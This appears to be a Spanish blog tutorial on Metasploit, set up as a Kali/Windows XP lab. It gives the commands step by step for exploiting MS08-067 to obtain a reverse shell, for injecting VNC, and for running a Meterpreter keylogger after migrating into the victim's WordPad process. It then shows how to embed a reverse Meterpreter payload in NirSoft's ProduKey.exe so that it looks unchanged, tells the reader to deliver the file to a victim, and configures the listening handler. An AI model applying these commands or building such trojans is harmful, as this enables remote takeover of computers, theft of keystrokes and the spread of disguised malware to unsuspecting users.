Lo
hacemos con una máquina Kali, que la ponemos en adaptador puente, y cogemos
otra máquina, en este caso un Windows XP el cual ponemos también en adaptador
puente para que se encuentren ambas máquinas en la misma red, ya que si no, el
ejercicio no podría realizarse.
Vamos a ver un ejemplo
con ms08_067_netatapi
Entramos
con msfconsole
Seleccionamos
el exploit: use exploit/windows/smb/ms08_067_netatapi
Seleccionamos
el PAYLOAD: set PAYLOAD windows/shell/reverse_tcp
Vemos
las opciones que tenemos que configurar: show options
Configuramos
las distintas opciones:
set RHOST 192.168.1.110
set LHOST 192.168.1.35
Lanzamos el
exploit: exploit
Nos devuelve la shell
del equipo de la víctima.
Otros
PAYLOADS:
Para conectarse por
VNC: windows/vncinject/reverse_tcp
Si
lanzamos el exploit lo que se ve es la pantalla de la víctima.
Para salir, se hace
pulsando control más C.
Meterpreter : windows/meterpreter/reverse_tcp
Si lanzamos el
exploit.
Un
ejemplo es el uso del capturador de pantalla.
Si
queremos ver los procesos activos para cambiar de proceso lo hacemos con un ps.
Voy
a cambiar al proceso del worpad para insertar un keylogger con el cual se
capturan las entradas del teclado.
Para
ello escribo en el worpad de la víctima.
Vemos
que proceso es.
Y
nos migramos a ese proceso.
Arrancamos
el keylogger.
Para
volcar los datos usamos dump.
Y se ve lo que se ha
escrito en el documento.
Y para detenerlo se
hace con keycan_stop.
Vamos
ahora a crear un troyano
Se creará un Troyado
utilizando Metasploit Framework, el cual permitirá incrustar un “Payload” o
Carga útil dentro de la utilidad ProduKey de NirSoft, el cual muestra el
ProductID de Windows, Microsoft Office, Exchange Server, y SQL Server instalado
en la computadora donde se ejecuta.
Se procede a descargar
y descomprimir el archivo ProducKey desde el sitio web de NirSoft.
Se
utiliza la herramienta msfpayload incluida en Metasploit Framework para inyectar
un Payload o Carga útil dentro del ejecutable ProduKey.exe.
En
el comando msfpayload
la opción LHOST
define la dirección IP local,
mientras que LPORT
define el puerto local. Es decir la
dirección IP y Puerto hacia el cual la victima realizará la conexión. Para el
comando msfencode,
la opción “-e”
define el codificador a utilizar, la opción “-c” define el número de veces en que
se codificarán los datos, la opción “-t” define el formato de salida, la opción “-x”
especifica una plantilla ejecutable alterna, y la opción “-o” define el archivo de salida.
#
msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.35 LPORT=443 R | msfencode -e
x86/shikata_ga_nai -c 1 -t exe -x ./ProduKey.exe -o /tmp/ProduKey.exe
El
proceso se ha realizado correctamente y se ha generado un nuevo archivo con el
mismo nombre, pero que incluye el "Payload" incrustado. Al realizar
un listado de archivos, anotar el tamaño de cada uno de los archivos, tanto el
archivo original como troyanizado "parecen" ser iguales.
Para
identificar de manera sencilla la diferencia entre estos dos archivos se genera
el hash SHA-1 de cada uno de ellos.
# sha1sum /tmp/ProduKey.exe ProduKey.exe
El
archivo troyanizado debe ser enviado a la víctima utilizando cualquier
mecanismo conocido.
Dado
que se ha definido un Payload Reverso de Meterpreter, se requiere configurar un
manejador para la conexión originada desde la victima hacia la dirección IP asignada
al sistema Kali Linux.
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.0.12
msf> set LPORT 443
msf> run
No hay comentarios:
Publicar un comentario